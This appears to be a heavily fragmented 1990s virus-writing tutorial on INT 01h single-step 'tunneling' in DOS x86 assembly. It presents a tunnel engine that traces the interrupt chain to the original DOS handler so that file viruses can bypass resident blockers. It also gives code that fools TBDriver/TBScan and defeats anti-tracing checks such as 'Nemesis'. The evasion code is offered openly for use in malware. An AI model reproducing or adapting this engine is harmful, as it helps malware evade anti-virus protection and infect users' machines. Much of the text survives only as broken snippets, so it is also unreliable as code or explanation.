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k Fiber of [Nu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Stepping Tunne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st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-tunnl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sm     - Example program that calls tunne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om     - Compiled ex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.asm      - The basic tunnel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Tunnel.asm    - Full blown tunne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exampl.asm    - Example using F-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-exampl.com    - Compiled f-examp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ing with INT 01h is an easy thing to do, about as easy as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file viruses, but, for some reason, guides for using INT 01h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ont exist like *.COM file virus guides do, so I'm goning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l and its clone 8086+ compatibles have a nice mode built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ngle Stepping, and its VERY handy for programmers like u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something specific in memory, for example, the kernal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, and bypassing other blocking TSR programs, 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blockers.  This tunneling technique is not the be all and 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nneling, as I will discuss some techniques and why they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tunneling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Single Step mode, we need to modify one of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g, and have set up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is a 16bit register and consists of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�--�--�--�--�OF�DF�IF�TF�SF�ZF�--�AF�--�PF�--�C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F 0E 0D 0C 0B 0A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: Carry Flag         Indicates an arithmatic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 : Parity Flag        Indicates an even number of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 : Auxilary Flag      Indicates adjustment needed in BC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 : Zero Flag          Indicates a zero result, or equ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: Sign Flag          Indicates negative result/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: Trap Flag          Controls Single Ste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: Interrupt Flag     Controls whether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: Direction Flag     Controls increment direction on string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: Overflow Flag      Indicates signed arithma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ne we need to concern ourselves with is the T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p flag is off, well, the Int 01h is not used, but when w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 to on, the Int 01h routine is called BEFORE each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ith that order in mind, you must hook the Int 01h, THE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that we must do is to hook Int 1h, then we need to set Int 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p flag to on, then lastly, call a function that we wish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code presented, we will be tunnel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is for a minimum of an 80286 or greater, because I do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ing for the lesser 8086 machin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 [ 80286+ | Priming the Tunnel code ]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will save and hook INT 01h, and put the processor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01v:        dd ?                            ;Old address for Int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21v:        dd ?                            ;the tracer modifi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                                   ;Save ou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                        ;Assume we are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                    ;from an exter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35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                            ;Get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mov     word ptr [Int_21v],bx           ;Save Int 21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mov     word ptr [Int_21v + 2]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1h                          ;Get Int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mov     word ptr [Int_01v],bx           ;Save Int 01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mov     word ptr [Int_01v + 2]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                        ;Set DS = CS for OUR Int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Int_01Handler         ;Our Int 01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        ;Set our Int 01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is first PUSHF, is used in conjunction with the CALL FAR [Int_21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de, as we need a FLAGS on the stack that has not got th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urned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                ;Sav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x,0100                         ;Set the T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                               ;re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e moment we POPF the flags, the trace mode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ecause of the way it works, the first instruction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ollowing the POPF is NOT traced, tracing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econd instruction AFTER the P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3306                        ;Set AX for INTERNAL_DOS_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ar [Int_21v]                   ;Call the In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we are faking an IN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e Int_01Handler routine takes over from here until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is finished. Only when its finished will control pass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When control is passed back, Int_21v will hold the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of the last cross segment jump before the trac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estore the old Int_0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dx,word ptr [Int_01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a                                    ;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ey, before I code the Int_1_Handler routine for you, we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me mor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s that the Int_1_Handler routine is designed to check wha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run next, so we need to know what some of the op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check fo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Eh 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h            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h            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our are the segment overides, and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BEFORE the opcode, but the CPU se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of the same opcode, so we must chec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siphon them off, to get the by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al opcode.  We also use them f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segment to take data from on things lik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 segment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Ch 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need to know this so we can get around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Dh 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need to check for the POPF because we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ther program from turning off the Trap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s, dissableling ou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h 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at we use to signal that our tr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h             JMP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h 1Eh         CALL FAR [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h 2Eh         JMP FAR [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 opcodes are used as cross segment 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mmonly hold the seg:offs of the next Int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last two (FF1Eh, FF2Eh) tak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gment overide, or the current D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what that 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 [ 80286+ | Tunnel Engine ]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actual code that does all the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has been somewhat (20bytes) optimised from the engine I used in Lad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bugfixed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se are our register offsets into the SS:SP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fl    equ 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cs    equ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ip    equ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x     equ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x     equ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x     equ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x     equ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p     equ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p     equ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i     equ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i     equ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s     equ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s     equ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s     equ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01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            ;Save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s                      ;Its not really nesecary to save S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                   ;but this engine was buil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One thing to note, if you want to know the TRUE value of S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is, you must subtract 6 from it, which covers the calling cs, ip &amp;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nd thats sub w[bp+_sp],6  not sub sp,6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[_status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unNextTe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[_status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word ptr [bp+_rfl+2],0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Get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xtTest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    si,word ptr [bp+22]     ;Get the seg:off of the next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                ;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        ;get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L now holds our bytevalu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heck for a segment overide, and if not, assume its working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etSegOveride           ;Get the segment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bx = segment we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heck the OPCod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9dh                 ;POP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Not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ey are attempting to POP the flags.  Just incase they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o turn the TF off, we keep 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word ptr [bp+_rfl+2],0100 ;Keep TRAPFLAG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NotPO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Not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or      byte ptr [_status]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NotPUS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cf                          ;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No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n IRET signals the end of our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o turn the TF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word ptr [bp+_rfl],0feff        ;Turn trace fl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NotI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eah                 ;Jmp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NotFar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 Cross segment jump!  Save the seg:offset its going to ju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e data for the cross seg jump is contained in the CS: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o, no chang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Jump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mov     word ptr [Int_21v+0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mov     word ptr [Int_21v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unNext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NotFar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ffh                 ;jmp d[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NotJm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[si],01eh      ;jmp d[xxxx]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J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[si],02eh      ;jmp d[xxxx]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ItsNotJm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Jmp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i                      ;skip jum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is opcode can use a segment override, s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bx                   ;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                           ;get storage offset of seg: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ax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JumpData             ;treat it like jmp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NotJmp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ext opcode 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Well, we dont need to monitor any more opc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xtO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                     ;Restor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                           ;Run the next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gOve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26h                 ;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NotS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[bp+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        ;Skip seg overide, to get nex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S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2eh                 ;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NotSeg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[bp+_r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        ;Skip seg overide, to get nex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Seg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36h                 ;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NotSeg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[bp+_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        ;Skip seg overide, to get nex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Seg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3eh                 ;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NotSe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[bp+_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        ;Skip seg overide, to get nex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Seg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word ptr [bp+_ds]    ;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   ;No override, so assume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tus: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presented here is, when compiled, somewhere around 20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Which I think is not too big, when you include it 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presented here was very basic in its structure. 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DOUBLE [BX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DOUBL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DOUBLE [SI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UBLE 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ing is that there are lots of other techniques for cro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, and including all types would expand the engine consider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t really be nesecary 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Stepping Tunnel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i-T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ey, so you have run the Example.Com program and TBDriver has b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une of Example.Com is trying to trace the Interrupt chain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ffect.  Your first question should be "How the hell does it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cing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glad you asked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emory                            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5678h       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DEADh       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                             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                              5678h,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;=5678h                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;=DEADh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      ;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ven tho we have poped them off memory, what has actually hap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 add had 2 added to it each time, adjusting where it point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values ARE STILL IN MEMORY, just below where SP points to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 we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sp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Memory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78h,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emory have not been altered in any way, jus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above example, this is what happens when we tu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  int 1 CS=code, flags=flags, and the # is the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 occurs, it pushes the flags, cs, and ip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emory                    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=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mov   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*int     1*                              3, code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push    ax             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*int     1*                              5, code, flags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mov     bx,5678h       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*int     1*                              7, code, flags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mov     cx,DEADh       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*int     1*                              9, code, flags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push    cx                             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   *int     1*                              b, code, flags,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push    bx                              5678h,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   *int     1*                              d, code, flags, 5678h, DEAD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    pop     ax      ;=5678h                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   *int     1*                              f, code, flags, DEADh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    pop     bx      ;=DEADh               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  *int     1*                              11, code, flags,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pop     cx      ;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were to subtract SP by 6, this time our Stack Memor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flags,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bottom 4 bytes are not 5678h, DEADh, thats becau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 occurs, it overwrites whats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pe I'm explaining this so you understan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Bdriver detects a tracer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ctual TB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its run without a tracer its Stack Memory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x=1234, bx=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  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      ;bx=5678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;ax=1234h      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x,bx   ;ax=5678h      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;ax=1234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p                      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p                     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;ax=1234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bx   ;ax=1234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;ax=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tack,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34h, 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 is decremented, and the stack untouched, 1234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traced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   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      ;bx=5678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;ax=1234h      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ax,bx   ;ax=5678h      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1234h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;ax=1234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p                      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p                      fl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fl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;ax=1234h       ;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bx   ;ax=1234h       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     1*                      ip, code, flags,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;ax=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x=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SP is decremented, because the last value pushed was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ote the previously pushed AX in memory...... TB detec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ts not what it expected it to be, and knows we are tr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get around this?  Well, in TBDriver, its struct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are a short jump OVER a far jump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21h..... So we check for TBcode, and use the far jump dat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fool TBScan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lace this code underneath the ItsNotJmpD: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fah                         ;CL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ndTB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0fc9c                        ;Is it TB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ndTB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05053                        ;TB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ndTB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si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[bp+_rip],si                   ;Run the original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i                              ;skip EAh, so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ARJum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BKi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e, I heard Nemesis is damn tricky?"  Eh? Not any more!  All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find tracers is do a PUSHF, then check W[BP+xx],0404, J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TF is on, the FLAGS is &gt; 0404, so, we add a status b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LAST OPCODE RUN was a PUSHF, so remove the TF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at simpl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of killing a tracer while its running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the address of Int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place the first byte of the Int 1h seg:offs with an IRE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the tr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ore the frist byte of Int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the cod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3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xchg    byte ptr [bx]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x,0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 xchg    byte ptr [bx]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 you defeat this?  Well, this *type* is pretty easy to avoi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oes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nder the EndTBKiller: label goes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INT_1_Ki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CDh                                 ;INT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nd_Kill_Int_1_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yte ptr [si],021h                      ;2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nd_Kill_Int_1_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word ptr [bp+_ax],03501                 ;GET INT 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End_Kill_Int_1_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 or      byte ptr [_Status],2                    ;turn on fake in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Kill_Int_1_Ki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nder  RunNextTest_1:  p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[_Status],2            ;fake th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unNextTes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yte ptr [_Status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word ptr [Int_01v]          ;get the orig, int 1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bp+_bx],ax            ;put in int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word ptr [Int_01v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[bp+_es],ax            ;put it i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w when it writes a byte to int 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will be writting to the unused i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xtTest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they get our Int_1 address directly from the IV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. you can check if they are putting a byte into ou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of the miriad of differnt ways one can put a by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in memory, well, if you are a masochist you ca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all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I've explained it so that you understand how tunneler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different kind of tunneler check out ART 2.2 wh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 vlad#4. This tunneler does not use int 1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each singl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well, if you didnt understand then i really screw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